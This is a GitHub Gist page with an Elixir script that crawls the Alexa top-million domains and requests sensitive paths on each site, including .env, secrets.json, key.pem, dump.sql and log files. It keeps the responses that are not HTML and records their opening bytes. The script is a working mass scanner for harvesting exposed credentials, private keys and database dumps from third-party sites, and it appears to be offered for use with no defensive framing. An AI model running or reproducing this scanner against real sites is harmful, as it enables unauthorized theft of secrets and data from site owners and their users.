Last active
April 3, 2023 08:57
-
-
Save mpfund/16dbe9f911dc3daa1a6dd56b2b67b7b6 to your computer and use it in GitHub Desktop.
crawler in elixir. finding secret files in alexa top 1m csv
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Mix.install([ | |
:req, | |
:csv, | |
:parallel_stream | |
]) | |
Logger.configure(level: :info) | |
# Desktop.ini, /.git/config, /.DS_Store, /.subversion/config, | |
# Dockerfile, package.json, .env, appsettings.json, secrets.json | |
# deploy.sh, | |
# .travis.yml, config.yml, docker-compose.yml, secrets.yml | |
# secret.php, secrets.php, settings.php, config.php | |
# config.py, settings.py, main.py, application.py | |
# config.js, dev.js, app.js | |
# config.json, default.json, appsettings.json, credentials.json | |
# db.properties, application.properties, app.properties, main.properties, | |
# dev.properties, config.properties | |
# log.log, app.log, db.log, staging.log, stage.log, production.log,prod.log | |
# user.log | |
# strings.xml, config.xml | |
# app.module.ts, environment.ts | |
files=[ | |
".env", | |
"appsettings.json", | |
"secrets.json", | |
"db.log", | |
"app.log", | |
"strings.xml", | |
"config.js", | |
"dev.js", | |
"app.js", | |
"secrets.php", | |
"httpd.conf", | |
".conf", | |
"dump.sql", | |
"db.sql", | |
"all.sql", | |
"backup_file.tar", | |
"db.dump", | |
"db.tar", | |
"db.dump.gz", | |
"env.js", | |
"dotenv", | |
"process.env", | |
"config", | |
"test.env", | |
"prod.env", | |
"stage.env", | |
"production.env", | |
"stage.env", | |
"app_key.pem", | |
"key.pem", | |
".env.js", | |
".env.json", | |
"Dockerfile", | |
"package.json", | |
"dev.properties", | |
"prod.properties", | |
"production.properties" | |
] | |
outFile = File.open!("out.txt", [:write, :utf8]) | |
"~/Downloads/top-1m.csv" | |
|>Path.expand() | |
|>File.stream!() | |
|>CSV.decode() | |
#|>Enum.reverse() | |
|>Stream.drop(60000) | |
#|>Stream.map(&IO.inspect/1) | |
|>Stream.filter(fn ({:ok,_})->true end) | |
|>Stream.flat_map(fn {:ok, [num,url]} -> | |
IO.puts("num# #{num}, #{url}") | |
Enum.map(files, &"https://"<>url<>"/"<>&1) | |
end) | |
|>ParallelStream.map(fn (url)-> | |
IO.puts("sending #{url}") | |
try do | |
%{url: url, req: Req.get(url, retry: false)} | |
rescue | |
Jason.DecodeError -> %{url: url, req: nil} | |
e in RuntimeError -> IO.puts("runtime error #{e.message}") | |
ErlangError -> IO.puts("erlang error") | |
end | |
end, num_workers: 5) | |
|>Stream.filter(fn | |
(%{req: {:ok, req}})-> | |
contentType = Req.Response.get_header(req,"content-type") | |
req.status==200 && length(contentType)>0 && | |
not String.contains?(Enum.at(contentType,0), "text/html") && | |
not String.starts_with?(req.body, "<doctype") # these files are not html | |
(_) -> false | |
end) | |
|>Stream.map(fn (a)-> | |
content = String.slice(elem(a.req,1).body, 0..20) | |
outStr = "#{a.url}: #{content}" | |
IO.puts(outStr) | |
IO.write(outFile, outStr) | |
end ) | |
|>Enum.take(1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment